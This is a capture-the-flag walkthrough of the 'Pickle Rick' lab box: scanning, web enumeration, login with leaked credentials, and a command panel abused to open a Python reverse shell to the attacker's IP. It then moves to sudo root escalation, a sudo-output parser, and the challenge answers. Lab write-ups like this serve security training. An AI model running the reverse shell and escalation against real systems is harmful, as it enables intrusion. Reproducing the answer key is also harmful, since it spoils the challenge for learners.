Task 1 Pickle Rick
This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -A 10.10.102.220
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-07 04:08 EDT
Nmap scan report for 10.10.102.220
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:ab:92:c8:5b:13:fe:8a:e9:09:67:c9:93:f0:dc:22 (RSA)
| 256 4c:ed:3d:e4:8f:97:c7:e3:fc:6b:61:78:3b:fe:2c:37 (ECDSA)
|_ 256 69:c3:2a:5d:2d:cc:08:db:ce:ee:2a:c5:d6:5f:10:13 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/7%OT=22%CT=1%CU=37661%PV=Y%DS=2%DC=T%G=Y%TM=642FCF95
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 281.69 ms 10.11.0.1
2 281.80 ms 10.10.102.220
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.07 seconds
┌──(root㉿kali)-[~]
└─# dirsearch -u 'http://10.10.102.220'
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.102.220/_23-04-07_04-13-43.txt
Error Log: /root/.dirsearch/logs/errors-23-04-07_04-13-43.log
Target: http://10.10.102.220/
[04:13:43] Starting:
[04:13:53] 403 - 299B - /.ht_wsr.txt
[04:13:53] 403 - 302B - /.htaccess.bak1
[04:13:53] 403 - 302B - /.htaccess.orig
[04:13:53] 403 - 304B - /.htaccess.sample
[04:13:53] 403 - 302B - /.htaccess.save
[04:13:53] 403 - 303B - /.htaccess_extra
[04:13:53] 403 - 300B - /.htaccess_sc
[04:13:53] 403 - 302B - /.htaccess_orig
[04:13:53] 403 - 300B - /.htaccessBAK
[04:13:53] 403 - 301B - /.htaccessOLD2
[04:13:53] 403 - 300B - /.htaccessOLD
[04:13:54] 403 - 292B - /.htm
[04:13:54] 403 - 293B - /.html
[04:13:54] 403 - 298B - /.htpasswds
[04:13:54] 403 - 302B - /.htpasswd_test
[04:13:54] 403 - 299B - /.httr-oauth
[04:13:57] 403 - 293B - /.php3
[04:13:57] 403 - 292B - /.php
[04:14:29] 301 - 315B - /assets -> http://10.10.102.220/assets/
[04:14:29] 200 - 2KB - /assets/
[04:14:54] 200 - 1KB - /index.html
[04:15:00] 200 - 882B - /login.php
[04:15:20] 200 - 17B - /robots.txt
[04:15:22] 403 - 302B - /server-status/
[04:15:22] 403 - 301B - /server-status
Task Completed
/robots.txt contains the string Wubbalubbadubdub, and the home page gives away Username: R1ckRul3s. login.php is the login page; log in with the two values just found (username R1ckRul3s, the robots.txt string as the password).
/portal.php has an input box that runs commands on the server. Since python3 is present, a Python reverse shell is used here. The command panel does not allow some commands to be run directly, so instead spawn a pseudo-terminal with Python and run them from the shell you get back.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.20.74",7788));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(root㉿kali)-[~]
└─# nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.11.20.74] from (UNKNOWN) [10.10.102.220] 48752
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ip-10-10-102-220:/var/www/html$ whoami
whoami
www-data
www-data@ip-10-10-102-220:/var/www/html$ cd /home
cd /home
www-data@ip-10-10-102-220:/home$ ls
ls
rick ubuntu
www-data@ip-10-10-102-220:/home$ cd rick
cd rick
www-data@ip-10-10-102-220:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-102-220:/home/rick$ cat second\ ingredients
cat second\ ingredients
1 jerry tear
www-data@ip-10-10-102-220:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
ip-10-10-102-220.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
ip-10-10-102-220.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
www-data@ip-10-10-102-220:/home/rick$ sudo bash
sudo bash
root@ip-10-10-102-220:/home/rick# whoami
whoami
root
root@ip-10-10-102-220:/home/rick# cd /root
cd /root
root@ip-10-10-102-220:~# ls
ls
3rd.txt snap
root@ip-10-10-102-220:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-102-220:~#
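The `sudo -l` output above is the whole privilege escalation: `(ALL) NOPASSWD: ALL` means www-data can run anything as root without a password, so `sudo bash` is enough. The added example below (my code, not part of the original writeup) parses `sudo -l` output in general, flags that blanket case, and otherwise lists the individual commands that would need to be checked for shell escapes. The first sample is the output shown on this page; the second is a constructed one with a limited rule set, to show the parser handling more than the trivial case.

```python
"""Triage of `sudo -l` output. Added example, not part of the original writeup."""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class SudoRule:
    runas: str      # contents of the "(...)" part, e.g. "ALL" or "root"
    nopasswd: bool  # True when the NOPASSWD: tag is present
    command: str    # one command, or "ALL"


# One rule line: "(ALL) NOPASSWD: ALL", "(root) /usr/bin/vim, /bin/less", ...
_RULE_RE = re.compile(
    r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Return one SudoRule per command listed after the 'User X may run ...' header."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue  # e.g. the wrapped hostname line under the header
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append(SudoRule(m.group("runas").strip(), nopasswd, cmd))
    return rules


def full_root_nopasswd(rules: List[SudoRule]) -> bool:
    """True when any rule is ALL commands as ALL/root with no password: `sudo bash` wins."""
    return any(
        r.command == "ALL" and r.nopasswd and r.runas.split(":")[0].strip() in ("ALL", "root")
        for r in rules
    )


def escalation_candidates(rules: List[SudoRule]) -> List[SudoRule]:
    """Specific binaries allowed via sudo; each needs checking for a shell escape."""
    return [r for r in rules if r.command != "ALL"]


# Sample 1: the output shown in this writeup (www-data on the Pickle Rick box).
SAMPLE_PAGE = r"""
Matching Defaults entries for www-data on
    ip-10-10-102-220.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
    ip-10-10-102-220.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
"""

# Sample 2: constructed, not from the page; a limited rule set for contrast.
SAMPLE_LIMITED = """
User alice may run the following commands on host01:
    (root) NOPASSWD: /usr/bin/vim, /bin/less
    (ALL) /usr/bin/apt-get
"""

if __name__ == "__main__":
    for name, sample in (("page", SAMPLE_PAGE), ("limited", SAMPLE_LIMITED)):
        rules = parse_sudo_l(sample)
        print(name, "blanket root:", full_root_nopasswd(rules))
        for r in escalation_candidates(rules):
            print("  check:", r)
```

For the page's output the result is a single `SudoRule("ALL", True, "ALL")` and `full_root_nopasswd` is true; for the constructed sample it is false and the three listed binaries are returned as candidates to inspect.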
1. What is the first ingredient Rick needs?
mr. meeseek hair
2. What's the second ingredient Rick needs?
jerry tear
3. What's the final ingredient Rick needs?
fleeb juice